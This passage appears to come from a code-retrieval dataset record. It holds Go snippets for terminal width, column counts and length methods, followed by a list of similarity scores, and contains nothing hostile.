argsList.Len() != 1 {\n\t\treturn newErrorFormulaArg(formulaErrorVALUE, \"COLUMNS requires 1 argument\")\n\t}\n\tmin, max := calcColumnsMinMax(argsList)\n\tif max == MaxColumns {\n\t\treturn newNumberFormulaArg(float64(MaxColumns))\n\t}\n\tresult := max - min + 1\n\tif max == min {\n\t\tif min == 0 {\n\t\t\treturn newErrorFormulaArg(formulaErrorVALUE, \"invalid reference\")\n\t\t}\n\t\treturn newNumberFormulaArg(float64(1))\n\t}\n\treturn newNumberFormulaArg(float64(result))\n}", "func TermSize() (width, height int, err error) {\n\tf, err := os.Open(\"/dev/tty\")\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\tdefer f.Close()\n\tsz, err := unix.IoctlGetWinsize(int(f.Fd()), unix.TIOCGWINSZ)\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\treturn int(sz.Col), int(sz.Row), nil\n}", "func getTableLen(table string) int {\n i := 0\n for _, char := range table {\n if char == '*' {\n break\n }\n i += 1\n }\n return i\n}", "func getTermWidth(fd int) int {\n\twidth := 80\n\tsize, err := unix.IoctlGetWinsize(fd, unix.TIOCGWINSZ)\n\tif err == nil {\n\t\twidth = int(size.Col)\n\t}\n\treturn width\n}", "func (access ColumnAccess) Size() int {\n return len(access.indices)\n}", "func getTermWidth(fd int) int {\n\twidth := 80\n\n\tvar info windows.ConsoleScreenBufferInfo\n\terr := windows.GetConsoleScreenBufferInfo(windows.Handle(fd), &info)\n\tif err == nil {\n\t\twidth = int(info.Size.X)\n\t}\n\treturn width\n}", "func (m *TaskManager) GetWIPTableLen() (lenWIPTable int) {\n\tm.WIPTable.Range(func(key, value interface{}) bool {\n\t\tlenWIPTable++\n\t\treturn true\n\t})\n\treturn\n}", "func (f *Frame) Len() int64 {\n\treturn f.Nchars\n}", "func (lvl ColLevel) Len() int {\n\treturn len(lvl.Labels)\n}", "func getTerminalSize(fd int) (width, height int, err error) {\n\twidth, height, err = terminal.GetSize(fd)\n\treturn width, height, err\n}", "func column(k int) int {\n\tswitch c := k / 4; {\n\tcase row(k) == 0:\n\t\treturn c - 1\n\tcase row(k) == 3 && isLeftHand(k):\n\t\treturn c + 1\n\tdefault:\n\t\treturn c\n\t}\n}", "func (mc MultiCursor) Length() int {\n\treturn len(mc.cursors)\n}", "func (c *Card) max() int {\n\treturn len(c.rows) * len(c.columns) * c.multiple\n}", "func CursorToNextColumn(columnHeight int) string {\n\tout := \"\"\n\tout += fmt.Sprint(cursorUp(columnHeight))\n\tout += fmt.Sprint(cursorRight(1))\n\n\treturn out\n}", "func columns(list []int, padding, maxcols, hspace int) []int {\n\tif hspace <= 0 {\n\t\treturn nil\n\t}\n\n\tn := len(list)\n\trows := n\n\tcols := []int(nil)\n\tmax := n\n\tif maxcols > 0 {\n\t\tmax = maxcols\n\t}\n\ntrial:\n\tfor c := 2; c <= max; c++ {\n\t\tg := newGridFromCols(n, c)\n\n\t\t// Continue if we don't reduce rows with this many columns.\n\t\tif g.Rows() >= rows {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Get the maximum widths of the individual columns.\n\t\tspan := make([]int, c)\n\t\tfor i := range g.IterRows() {\n\t\t\tif i.Ok && list[i.Idx] > span[i.Col] {\n\t\t\t\tspan[i.Col] = list[i.Idx]\n\t\t\t}\n\t\t}\n\n\t\t// Have we reached the limit yet?\n\t\tpadspace := padding * (len(cols) - 1)\n\t\t// FIXME: the -padding should not be necessary!\n\t\tif sum(span)+padspace > hspace-padding {\n\t\t\tbreak trial\n\t\t}\n\n\t\t// Update our data.\n\t\trows = g.Rows()\n\t\tcols = span\n\t}\n\n\t// Add the padding.\n\tfor i := 0; i < len(cols)-1; i++ {\n\t\tcols[i] += padding\n\t}\n\treturn cols\n}", "func getTerminalSize() (width,height int) {\n cmd := exec.Command(\"stty\",\"size\")\n cmd.Stdin = os.Stdin\n out,err := cmd.Output()\n\n if err != nil {\n\t//default size\n width = 70\n height = 10\n\treturn \n } else {\n\t// command's result pattern => [width height\\n]\n tmp := strings.Split(strings.Trim(string(out),\"\\n\"),\" \");\n height,err = strconv.Atoi(tmp[0])\n width,err = strconv.Atoi(tmp[1])\n return \n }\n}", "func (cr *callResult) ColumnTypeLength(idx int) (int64, bool) {\n\treturn cr.outputFields[idx].TypeLength()\n}", "func TerminalWidth() int {\n\tif runtime.GOOS == \"windows\" {\n\t\treturn readline.GetScreenWidth()\n\t}\n\n\treturn getWidth()\n}", "func (gd *Definition) Ncells() int {\n\treturn gd.Ncol * gd.Nrow\n}", "func getCursorPosition(ifd, ofd int) int {\n\t// query the cursor location\n\tif puts(ofd, \"\\x1b[6n\") != 4 {\n\t\treturn -1\n\t}\n\t// read the response: ESC [ rows ; cols R\n\t// rows/cols are decimal number strings\n\tbuf := make([]rune, 0, 32)\n\tu := utf8{}\n\n\tfor len(buf) < 32 {\n\t\tr := u.getRune(ifd, &timeout20ms)\n\t\tif r == KeycodeNull {\n\t\t\tbreak\n\t\t}\n\t\tbuf = append(buf, r)\n\t\tif r == 'R' {\n\t\t\tbreak\n\t\t}\n\t}\n\t// parse it: esc [ number ; number R (at least 6 characters)\n\tif len(buf) < 6 || buf[0] != KeycodeESC || buf[1] != '[' || buf[len(buf)-1] != 'R' {\n\t\treturn -1\n\t}\n\t// should have 2 number fields\n\tx := strings.Split(string(buf[2:len(buf)-1]), \";\")\n\tif len(x) != 2 {\n\t\treturn -1\n\t}\n\t// return the cols\n\tcols, err := strconv.Atoi(x[1])\n\tif err != nil {\n\t\treturn -1\n\t}\n\treturn cols\n}", "func (cc *charCounts) Len() int {\n\treturn len(cc.counts)\n}", "func(h*ColumnHandler)lastColumn() string {\n\treturn \"XFD\"\n}", "func (mr *MemoryRow) MaxCol() int {\n\treturn mr.maxCol\n}", "func (ref *UIElement) NumberOfCharacters() int64 {\n\tret, _ := ref.Int64Attr(NumberOfCharactersAttribute)\n\treturn ret\n}" ]
[ "0.65468746", "0.6216222", "0.6080732", "0.6039732", "0.59775245", "0.5952306", "0.5922178", "0.59129816", "0.58751225", "0.58284223", "0.58216983", "0.5815894", "0.57869226", "0.5776121", "0.5771894", "0.57390213", "0.5737454", "0.57297176", "0.5712563", "0.57088536", "0.56801724", "0.5664643", "0.5661473", "0.5625978", "0.560217", "0.5574958", "0.55540925", "0.55405104", "0.5531226", "0.55196834", "0.54807097", "0.54585797", "0.5421185", "0.54156816", "0.5381584", "0.53512436", "0.5347365", "0.5330076", "0.532375", "0.52930164", "0.52034897", "0.5202399", "0.5182781", "0.5166395", "0.51414514", "0.5135954", "0.51266646", "0.511515", "0.50696915", "0.5055846", "0.5052382", "0.5025797", "0.5015092", "0.5008057", "0.50067043", "0.49838582", "0.49816298", "0.49599472", "0.49525312", "0.49433208", "0.48925593", "0.4890407", "0.4889372", "0.4889372", "0.4887699", "0.48871008", "0.48815092", "0.4881459", "0.4879904", "0.4879291", "0.4874849", "0.48701093", "0.4862721", "0.48427007", "0.4841753", "0.4826114", "0.48013535", "0.47810337", "0.47778222", "0.47680497", "0.47489253", "0.4738668", "0.4738516", "0.47248167", "0.47178295", "0.47138584", "0.47111", "0.47035295", "0.47009158", "0.46977177", "0.46879727", "0.46830294", "0.46615353", "0.46521208", "0.46436566", "0.46388432", "0.46376342", "0.46219155", "0.46101657", "0.45923832" ]
0.6874037
0
Return true if we know we don't support this terminal.
func unsupportedTerm() bool { _, ok := unsupported[os.Getenv("TERM")] return ok }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func IsTerminal(fd uintptr) bool {\r\n\treturn false\r\n}", "func isTerminal(f *os.File) bool {\n\tlog.Fatalf(\"hyperkit: Function not supported on your OS\")\n\treturn false\n}", "func terminalIsDumb() bool {\n var term = os.Getenv(\"TERM\")\n\n if term == \"\" || term == \"dumb\" {\n return true\n }\n\n return false\n}", "func IsTerminal(fd uintptr) bool {\n\tvar trap uintptr // SYS_IOCTL\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\tswitch runtime.GOARCH {\n\t\tcase \"amd64\":\n\t\t\ttrap = 16\n\t\tcase \"arm64\":\n\t\t\ttrap = 29\n\t\tcase \"mips\", \"mipsle\":\n\t\t\ttrap = 4054\n\t\tcase \"mips64\", \"mips64le\":\n\t\t\ttrap = 5015\n\t\tdefault:\n\t\t\ttrap = 54\n\t\t}\n\tdefault:\n\t\ttrap = 54\n\t}\n\n\tvar req uintptr // TIOCGETA\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\tswitch runtime.GOARCH {\n\t\tcase \"ppc64\", \"ppc64le\":\n\t\t\treq = 0x402c7413\n\t\tcase \"mips\", \"mipsle\", \"mips64\", \"mips64le\":\n\t\t\treq = 0x540d\n\t\tdefault:\n\t\t\treq = 0x5401\n\t\t}\n\tcase \"darwin\":\n\t\tswitch runtime.GOARCH {\n\t\tcase \"amd64\", \"arm64\":\n\t\t\treq = 0x40487413\n\t\tdefault:\n\t\t\treq = 0x402c7413\n\t\t}\n\tdefault:\n\t\treq = 0x402c7413\n\t}\n\n\tvar termios [256]byte\n\t_, _, err := syscall.Syscall6(trap, fd, req, uintptr(unsafe.Pointer(&termios[0])), 0, 0, 0)\n\treturn err == 0\n}", "func IsTerminal() bool {\n\treturn (os.Getenv(\"TERM\") != \"\" && os.Getenv(\"TERM\") != \"dumb\") || os.Getenv(\"ConEmuANSI\") == \"ON\"\n}", "func IsTerminal(fd uintptr) bool {\n\t_, e := GetConsoleMode(fd)\n\treturn e == nil\n}", "func IsTerminal(w io.Writer) bool {\n\tfw, ok := w.(fder)\n\tif !ok {\n\t\treturn false\n\t}\n\tvar st uint32\n\tr, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, fw.Fd(), uintptr(unsafe.Pointer(&st)), 0)\n\treturn r != 0 && e == 0\n}", "func IsTerminal(fd int) bool {\n\t// FIXME(bp) implement this for BSD/Darwin to read from stdin.\n\treturn false\n}", "func IsTerminal() bool {\n\treturn isTerminal\n}", "func isTerminal() bool {\n\treturn terminal.IsTerminal(syscall.Stdin)\n}", "func inTerminal() bool {\n\treturn term.IsTerminal(int(os.Stdin.Fd()))\n}", "func Isatty() bool {\n\treturn CapTTY.Isatty()\n}", "func IsSupportColor() bool {\n\t// \"TERM=xterm\" support color\n\t// \"TERM=xterm-vt220\" support color\n\t// \"TERM=xterm-256color\" support color\n\t// \"TERM=cygwin\" don't support color\n\tif strings.Contains(os.Getenv(\"TERM\"), \"xterm\") {\n\t\treturn true\n\t}\n\n\t// like on ConEmu software, e.g \"ConEmuANSI=ON\"\n\tif os.Getenv(\"ConEmuANSI\") == \"ON\" {\n\t\treturn true\n\t}\n\n\t// like on ConEmu software, e.g \"ANSICON=189x2000 (189x43)\"\n\tif os.Getenv(\"ANSICON\") != \"\" {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func IsTerminal(fd int) bool {\n\t_, err := unix.IoctlGetTermios(fd, ioctlReadTermios)\n\treturn err == nil\n}", "func (v defaultTTYImpl) Isatty() bool {\n\tif config.MockNoTTY() {\n\t\treturn false\n\t}\n\tif isatty.IsTerminal(os.Stdin.Fd()) &&\n\t\tisatty.IsTerminal(os.Stdout.Fd()) {\n\t\treturn true\n\t} else if isatty.IsCygwinTerminal(os.Stdin.Fd()) &&\n\t\tisatty.IsCygwinTerminal(os.Stdout.Fd()) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func IsTty(fd uintptr) bool {\n\tvar termios Termios\n\t_, _, err := syscall.Syscall(syscall.SYS_IOCTL,\n\t\tfd,\n\t\tuintptr(syscall.TCGETS),\n\t\tuintptr(unsafe.Pointer(&termios)))\n\treturn err == 0\n}", "func IsTerminal(fd int) bool {\n\tvar termios syscall.Termios\n\t_, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), ioctlReadTermios, uintptr(unsafe.Pointer(&termios)), 0, 0, 0)\n\treturn err == 0\n}", "func IsTerminal(fd uintptr) bool {\n\treturn isatty.IsTerminal(fd)\n}", "func IsTerminal(fd uintptr) bool {\n\treturn isatty.IsTerminal(fd)\n}", "func IsTerminal() bool {\n\t// Windows is always a terminal\n\tif runtime.GOOS == \"windows\" {\n\t\treturn true\n\t}\n\n\t// Same implementation as readline but with our custom fds\n\treturn readline.IsTerminal(int(wrappedstreams.Stdin().Fd())) &&\n\t\t(readline.IsTerminal(int(wrappedstreams.Stdout().Fd())) ||\n\t\t\treadline.IsTerminal(int(wrappedstreams.Stderr().Fd())))\n}", "func hasExec() bool {\n\tswitch runtime.GOOS {\n\tcase \"wasip1\", \"js\", \"ios\":\n\t\treturn false\n\t}\n\treturn true\n}", "func IsSupported() bool {\n\treturn false\n}", "func (s StateCode) Terminal() bool {\n\tswitch s {\n\tcase Runnable, Sleeping, Paused, Fault:\n\t\treturn false\n\tcase Completed, Killed, Failed:\n\t\treturn true\n\tdefault:\n\t\tmetafora.Error(\"unknown state: \", s)\n\t\treturn false\n\t}\n}", "func IsNotTerminal(err error) bool {\n\treturn isNotTerminal(err)\n}", "func IsTerminal() bool {\n\treturn readline.IsTerminal(syscall.Stdout)\n}", "func (w *WinColorTerminal) ColorSupported() bool {\n\treturn true\n}", "func (s Attempt_State) Terminal() bool {\n\treturn len(validAttemptStateEvolution[s]) == 0\n}", "func IsTerminal(f *os.File) bool {\n\tif runtime.GOOS == \"windows\" {\n\t\treturn false\n\t}\n\n\tfd := f.Fd()\n\treturn os.Getenv(\"TERM\") != \"dumb\" && (isatty.IsTerminal(fd) || isatty.IsCygwinTerminal(fd))\n}", "func IsWindows() bool { return false }", "func (c *State) Terminal() bool {\n\treturn terminal.IsTerminal(int(os.Stdout.Fd()))\n}", "func supportsStdin() bool {\n\tfileInfo, err := os.Stdin.Stat()\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn fileInfo.Mode()&(os.ModeCharDevice|os.ModeCharDevice) != 0\n}", "func IsTTY(fd any) bool {\n\tif s, ok := fd.(*sync.Writer); ok {\n\t\t// STDOUT is commonly wrapped in a sync.Writer, so here\n\t\t// we unwrap it to gain access to the underlying Writer/STDOUT.\n\t\tfd = s.W\n\t}\n\tif f, ok := fd.(*os.File); ok {\n\t\treturn term.IsTerminal(int(f.Fd()))\n\t}\n\treturn false\n}", "func (state *State) IsTerminal() bool {\n\tval := C.StateIsTerminal(state.state)\n\treturn val == 1\n}", "func IsTerminal(x string) bool {\n\tif x == \"\" {\n\t\treturn true\n\t}\n\n\tfirstChar := string([]rune(x)[0])\n\tif firstChar == strings.ToLower(firstChar) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (w *Writer) IsTerminal() bool {\n\treturn w.terminal\n}", "func IsTerminal(w io.Writer) bool {\n\tif v, ok := (w).(*os.File); ok {\n\t\treturn terminal.IsTerminal(int(v.Fd()))\n\t}\n\treturn false\n}", "func (e *PlanRolledBackEvent) isTerminalEvent() bool { return true }", "func InteractiveTerminal() bool {\n\t// If there's a 'TERM' variable and the terminal is 'dumb', then disable interactive mode.\n\tif v := strings.ToLower(os.Getenv(\"TERM\")); v == \"dumb\" {\n\t\treturn false\n\t}\n\n\t// if we're piping in stdin, we're clearly not interactive, as there's no way for a user to\n\t// provide input. If we're piping stdout, we also can't be interactive as there's no way for\n\t// users to see prompts to interact with them.\n\treturn terminal.IsTerminal(int(os.Stdin.Fd())) &&\n\t\tterminal.IsTerminal(int(os.Stdout.Fd()))\n}", "func (m WatchMode) Supported() bool {\n\tswitch m {\n\tcase WatchMode_WatchModePortable:\n\t\treturn true\n\tcase WatchMode_WatchModeForcePoll:\n\t\treturn true\n\tcase WatchMode_WatchModeNoWatch:\n\t\treturn true\n\tdefault:\n\t\treturn false\n\t}\n}", "func CmdAvailability(cmd *TermDependant) string {\n\tswitch GetTerminal() {\n\tcase TermBash:\n\t\tif cmd.Bash == \"\" {\n\t\t\tif GetTerminalHasWSL() && cmd.Powershell != \"\" {\n\t\t\t\treturn orange + \" (windows wsl)\" + reset\n\t\t\t}\n\t\t\treturn red + \" (windows only)\" + reset\n\t\t}\n\tcase TermCmd, TermPowershell:\n\t\tif cmd.Powershell == \"\" {\n\t\t\tif GetTerminalHasWSL() && cmd.Bash != \"\" {\n\t\t\t\treturn orange + \" (bash wsl)\" + reset\n\t\t\t}\n\t\t\treturn red + \" (bash only)\" + reset\n\t\t}\n\t}\n\treturn \"\"\n}", "func Supports() bool {\n\tif htesting.SupportsAll() {\n\t\treturn true\n\t}\n\treturn getRstExecPath() != \"\"\n}", "func detectDOS() bool {\n\tif runtime.GOOS != \"windows\" {\n\t\treturn false\n\t}\n\tshell := os.Getenv(\"SHELL\")\n\tif strings.Contains(shell, \"bash\") ||\n\t\tstrings.Contains(shell, \"zsh\") ||\n\t\tstrings.Contains(shell, \"fish\") ||\n\t\tstrings.Contains(shell, \"csh\") ||\n\t\tstrings.Contains(shell, \"ksh\") ||\n\t\tstrings.Contains(shell, \"ash\") {\n\t\treturn false\n\t}\n\treturn true\n}", "func (s IOStreams) IsCygwinTerminal() bool {\n\tif osOutFile, ok := s.Out.(*os.File); ok {\n\t\tif osOutFile == os.Stdout {\n\t\t\treturn isatty.IsCygwinTerminal(osOutFile.Fd())\n\t\t}\n\t}\n\treturn false\n}", "func checkShell() bool {\n\t// https://en.wikibooks.org/wiki/OpenSSH/Client_Applications\n\treturn len(os.Getenv(\"SSH_CLIENT\")) == 0\n}", "func (e NotSupported) IsNotSupported() {}", "func isInteractive() bool {\n\tfileInfo, err := os.Stdin.Stat()\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn fileInfo.Mode()&(os.ModeCharDevice|os.ModeCharDevice) != 0\n}", "func IsSudoCmdAvailableForThisUser() bool {\n\tcmd := exec.Command(\"sudo\", \"-n\", \"true\") // can this user use sudo with passwd prompts ?\n\tcmd.Stderr = nil\n\tcmd.Stdout = nil\n\n\terr := cmd.Run()\n\n\treturn err == nil\n}", "func IsTerminal(f *os.File) (is bool, err error) {\n\tc, err := f.SyscallConn()\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = c.Control(func(fd uintptr) {\n\t\tis = term.IsTerminal(int(fd))\n\t})\n\n\treturn\n}", "func IsTerminal(state pps.JobState) bool {\n\tswitch state {\n\tcase pps.JobState_JOB_SUCCESS, pps.JobState_JOB_FAILURE, pps.JobState_JOB_KILLED:\n\t\treturn true\n\tcase pps.JobState_JOB_STARTING, pps.JobState_JOB_RUNNING:\n\t\treturn false\n\tdefault:\n\t\tpanic(fmt.Sprintf(\"unrecognized job state: %s\", state))\n\t}\n}", "func (cs *CredentialSpecResource) DesiredTerminal() bool {\n\tcs.lock.RLock()\n\tdefer cs.lock.RUnlock()\n\n\treturn cs.desiredStatusUnsafe == resourcestatus.ResourceStatus(CredentialSpecRemoved)\n}", "func (i Instruction) IsTerminal() bool {\n\t// TODO(mbm): how about the RETF* instructions\n\treturn i.Opcode == \"RET\"\n}", "func (rd *Reader) IsTerminal(r rune) bool {\n\tif isSpace(r) {\n\t\treturn true\n\t}\n\n\tif rd.dispatching {\n\t\t_, found := rd.dispatch[r]\n\t\tif found {\n\t\t\treturn true\n\t\t}\n\t}\n\n\t_, found := rd.macros[r]\n\treturn found\n}", "func IsTerminal(state State) bool {\n\treturn (state == Completed || state == Failed)\n}", "func (s *commonStream) IsTerminal() bool {\n\treturn s.isTerminal\n}", "func IsWin() bool { return false }", "func (context Context) IsUsingKeyboard() bool {\n\treturn imgui.CurrentIO().WantTextInput()\n}", "func hasUnsupportedChar(str string) bool {\n\treg := `[^0-9a-zA-Z-_\\.\\s]` // add some characters that contain in the vm names\n\treturn regexp.MustCompile(reg).Match([]byte(str))\n}", "func (a *_Atom) isTerminalHeteroAtom() bool {\n\treturn a.atNum != 6 && a.bonds.Count() == 1\n}", "func (a *_Atom) isTerminal() bool {\n\treturn a.bonds.Count() == 1\n}", "func (this *KeyspaceTerm) IsSystem() bool {\n\treturn this.path != nil && this.path.IsSystem()\n}", "func IsPromptable(c Contextualizer) bool {\n\treturn c.IsInteractive()\n}", "func FreeConsole() bool {\n\tret1 := syscall3(freeConsole, 0,\n\t\t0,\n\t\t0,\n\t\t0)\n\treturn ret1 != 0\n}", "func (c *Container) KnownTerminal() bool {\n\treturn c.GetKnownStatus().Terminal()\n}", "func (j JobPhase) IsTerminal() bool {\n\tswitch j {\n\tcase JobPhaseAborted:\n\t\tfallthrough\n\tcase JobPhaseCanceled:\n\t\tfallthrough\n\tcase JobPhaseFailed:\n\t\tfallthrough\n\tcase JobPhaseSchedulingFailed:\n\t\tfallthrough\n\tcase JobPhaseSucceeded:\n\t\tfallthrough\n\tcase JobPhaseTimedOut:\n\t\treturn true\n\t}\n\treturn false\n}", "func (t *Tile) IsTerminal() bool {\n\tif t.GetSuit().GetSuitType() != SuitTypeSimple {\n\t\treturn false\n\t}\n\treturn t.GetOrdinal() == 0 || t.GetOrdinal() == t.GetSuit().GetSize()-1\n}", "func Interactive() bool {\n\treturn !DisableInteractive && InteractiveTerminal() && !ciutil.IsCI()\n}", "func isOpen() bool {\n\tif _, err := exec.Command(\"bash\", \"-c\", \"ps cax | grep Nox\").Output(); err != nil {\n\t\tlog.Println(\"not open\")\n\t\treturn false\n\t}\n\tlog.Println(\"open\")\n\treturn true\n}", "func (me TxsdSystemSpoofed) IsUnknown() bool { return me.String() == \"unknown\" }", "func (c *Container) DesiredTerminal() bool {\n\treturn c.GetDesiredStatus().Terminal()\n}", "func IsSupported() bool {\n\treturn true\n}", "func IsSupported() bool {\n\treturn true\n}", "func (s *Service) IsSupported() bool {\n\tfileExists := s.d.isFileExists(\"/data/local/tmp/minicap\")\n\tif !fileExists {\n\t\terr := s.Install()\n\t\tif err != nil {\n\t\t\treturn false\n\t\t}\n\t}\n\tout, err := s.d.shell(\"LD_LIBRARY_PATH=/data/local/tmp /data/local/tmp/minicap -i\")\n\tif err != nil {\n\t\treturn false\n\t}\n\tsupported := strings.Contains(out, \"height\") && strings.Contains(out, \"width\")\n\treturn supported\n}", "func (pvc ProtocolVersionAndCommand) IsUnspec() bool {\n\treturn !(pvc.IsLocal() || pvc.IsProxy())\n}", "func isSystemdBasedOS() bool {\n\treturn exec.Command(\"/usr/bin/pidof\", \"systemd\").Run() == nil || exec.Command(\"/bin/pidof\", \"systemd\").Run() == nil\n}", "func isVaildCmd(c string) bool {\n\tif len(c) == 0 || c[0:1] == \"-\" {\n\t\treturn false\n\t}\n\treturn true\n}", "func (tok Token) IsCommand() bool {\n\treturn commandBegin < tok && tok < commandEnd\n}", "func (r *Response) Supported() bool {\n\treturn !strings.Contains(r.String(), NotSupported)\n}", "func isUnsupportedFlag(value string) bool {\n\n\t// a flag should be at least two characters log\n\tif len(value) >= 2 {\n\n\t\t// if short flag, it should start with `-` but not with `--`\n\t\tif len(value) == 2 {\n\t\t\treturn !strings.HasPrefix(value, \"-\") || strings.HasPrefix(value, \"--\")\n\t\t}\n\n\t\t// if long flag, it should start with `--` and not with `---`\n\t\treturn !strings.HasPrefix(value, \"--\") || strings.HasPrefix(value, \"---\")\n\t}\n\n\treturn false\n}", "func IsCmd() bool {\n\tproc, _ := ps.FindProcess(os.Getppid())\n\tif proc != nil && !strings.Contains(proc.Executable(), \"cmd.exe\") {\n\t\treturn false\n\t}\n\treturn true\n}", "func IsTerminalPhase(phase buildapi.BuildPhase) bool {\n\tswitch phase {\n\tcase buildapi.BuildPhaseNew,\n\t\tbuildapi.BuildPhasePending,\n\t\tbuildapi.BuildPhaseRunning:\n\t\treturn false\n\t}\n\treturn true\n}", "func (s *HTTPServer) IsUIEnabled() bool {\n\treturn s.agent.config.UIDir != \"\" || s.agent.config.EnableUI\n}", "func (e *PlanChangedEvent) isTerminalEvent() bool { return false }", "func (e *Engine) startable() bool {\n\tif e.Configuration.InputDeviceNamesUnset() && e.Configuration.InputValueDescriptorNamesUnset() {\n\t\treturn false\n\t}\n\n\tif e.booted {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (s IOStreams) IsTerminal() bool {\n\tif osOutFile, ok := s.Out.(*os.File); ok {\n\t\tif osOutFile == os.Stdout {\n\t\t\treturn isatty.IsTerminal(osOutFile.Fd())\n\t\t}\n\t}\n\treturn false\n}", "func IsAvailable() bool {\n\tif isAvailable_ < 0 {\n\t\ttoolName_ = \"\"\n\t\tisAvailable_ = 0\n\n\t\tcandidates := []string{\n\t\t\t\"gvfs-trash\",\n\t\t\t\"trash\",\n\t\t}\n\n\t\tfor _, candidate := range candidates {\n\t\t\terr := exec.Command(\"type\", candidate).Run()\n\t\t\tok := false\n\t\t\tif err == nil {\n\t\t\t\tok = true\n\t\t\t} else {\n\t\t\t\terr = exec.Command(\"sh\", \"-c\", \"type \"+candidate).Run()\n\t\t\t\tif err == nil {\n\t\t\t\t\tok = true\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif ok {\n\t\t\t\ttoolName_ = candidate\n\t\t\t\tisAvailable_ = 1\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\n\t\treturn false\n\t} else if isAvailable_ == 1 {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (i *InteractiveMode) Failed() bool {\n\treturn false\n}", "func (s *Scanner) IsSupportedVersion(osFamily, osVer string) bool {\n\t// EOL is not in public at the moment.\n\treturn true\n}", "func (p *Wheel) Compatible(env *Environment) bool {\n\treturn p.Preference(env) >= 0\n}", "func Supported() bool { return true }", "func (e Keyboard) IsGraphic() bool {\n\treturn !e.Control && !e.Meta && unicode.IsGraphic(e.Rune)\n}", "func (me TxsdSystemSpoofed) IsNo() bool { return me.String() == \"no\" }", "func CanSudo() bool {\n\tcmd := exec.Command(\"sudo\", \"-nv\")\n\treturn cmd.Run() == nil\n}", "func (m *Machine) IsTerminal() (bool, string, error) {\n\tif m.vmInstance == nil || m.vmiInstance == nil {\n\t\t// vm/vmi hasn't been created yet\n\t\treturn false, \"\", nil\n\t}\n\n\t// VMI is being asked to terminate gracefully due to node drain\n\tif !m.vmiInstance.IsFinal() &&\n\t\t!m.vmiInstance.IsMigratable() &&\n\t\tm.vmiInstance.Status.EvacuationNodeName != \"\" {\n\t\t// VM's infra node is being drained and VM is not live migratable.\n\t\t// We need to report a FailureReason so the MachineHealthCheck and\n\t\t// MachineSet controllers will gracefully take the VM down.\n\t\treturn true, \"The Machine's VM pod is marked for eviction due to infra node drain.\", nil\n\t}\n\n\t// The infrav1.KubevirtVMTerminalLabel is a way users or automation to mark\n\t// a VM as being in a terminal state that requires remediation. This is used\n\t// by the functional test suite to test remediation and can also be triggered\n\t// by users as a way to manually trigger remediation.\n\tterminalReason, ok := m.vmInstance.Labels[infrav1.KubevirtMachineVMTerminalLabel]\n\tif ok {\n\t\treturn true, fmt.Sprintf(\"VM's %s label has the vm marked as being terminal with reason [%s]\", infrav1.KubevirtMachineVMTerminalLabel, terminalReason), nil\n\t}\n\n\t// Also check the VMI for this label\n\tterminalReason, ok = m.vmiInstance.Labels[infrav1.KubevirtMachineVMTerminalLabel]\n\tif ok {\n\t\treturn true, fmt.Sprintf(\"VMI's %s label has the vm marked as being terminal with reason [%s]\", infrav1.KubevirtMachineVMTerminalLabel, terminalReason), nil\n\t}\n\n\trunStrategy, err := m.vmInstance.RunStrategy()\n\tif err != nil {\n\t\treturn false, \"\", err\n\t}\n\n\tswitch runStrategy {\n\tcase kubevirtv1.RunStrategyAlways:\n\t\t// VM should recover if it is down.\n\t\treturn false, \"\", nil\n\tcase kubevirtv1.RunStrategyManual:\n\t\t// If VM is manually controlled, we stay out of the loop\n\t\treturn false, \"\", nil\n\tcase kubevirtv1.RunStrategyHalted, kubevirtv1.RunStrategyOnce:\n\t\tif m.vmiInstance.IsFinal() {\n\t\t\treturn true, \"VMI has reached a permanent finalized state\", nil\n\t\t}\n\t\treturn false, \"\", nil\n\tcase kubevirtv1.RunStrategyRerunOnFailure:\n\t\t// only recovers when vmi is failed\n\t\tif m.vmiInstance.Status.Phase == kubevirtv1.Succeeded {\n\t\t\treturn true, \"VMI has reached a permanent finalized state\", nil\n\t\t}\n\t\treturn false, \"\", nil\n\t}\n\n\treturn false, \"\", nil\n}", "func (cmd *command) avoidUserInteraction() bool {\n\treturn cmd.NonInteractive || cmd.CI\n}", "func (v *Display) SupportsComposite() bool {\n\tc := C.gdk_display_supports_composite(v.native())\n\treturn gobool(c)\n}", "func (o *WorkflowCliCommandAllOf) HasTerminalEnd() bool {\n\tif o != nil && o.TerminalEnd != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func IsCmd(cmd string)(b bool) {\n\n\tvar i uint32\n\n\tprogPath := \"/programs/\"\n\n\tfiles, status := altEthos.SubFiles(progPath)\n\tif status != syscall.StatusOk {\n\n\t\tshellStatus := String(\"Subfiles failed\\n\")\n\t\taltEthos.WriteStream(syscall.Stdout, &shellStatus)\n\n\t}\n\n\tb = false\n\n\tfor i=0; i<uint32(len(files)); i++ {\n\n\t\tif files[i] == cmd {\n\t\t\tb = true\n\t\t}\n\n\t}\n\n\treturn\n}", "func SupportsUnprivilegedCloneNewUser() bool {\n\tcmd := exec.Command(\"/bin/true\")\n\tcmd.SysProcAttr = &syscall.SysProcAttr{}\n\tcmd.SysProcAttr.Cloneflags = syscall.CLONE_NEWUSER\n\tif err := cmd.Run(); err != nil {\n\t\treturn false\n\t}\n\treturn true\n}", "func GetTerminalInfo() {\n\tif term.IsTerminal(0) {\n\t\tfmt.Println(\"in a term\")\n\t} else {\n\t\tfmt.Println(\"not in a term\")\n\t}\n}", "func Supported() bool {\n\treturn gobool(C.keybinder_supported())\n}" ]
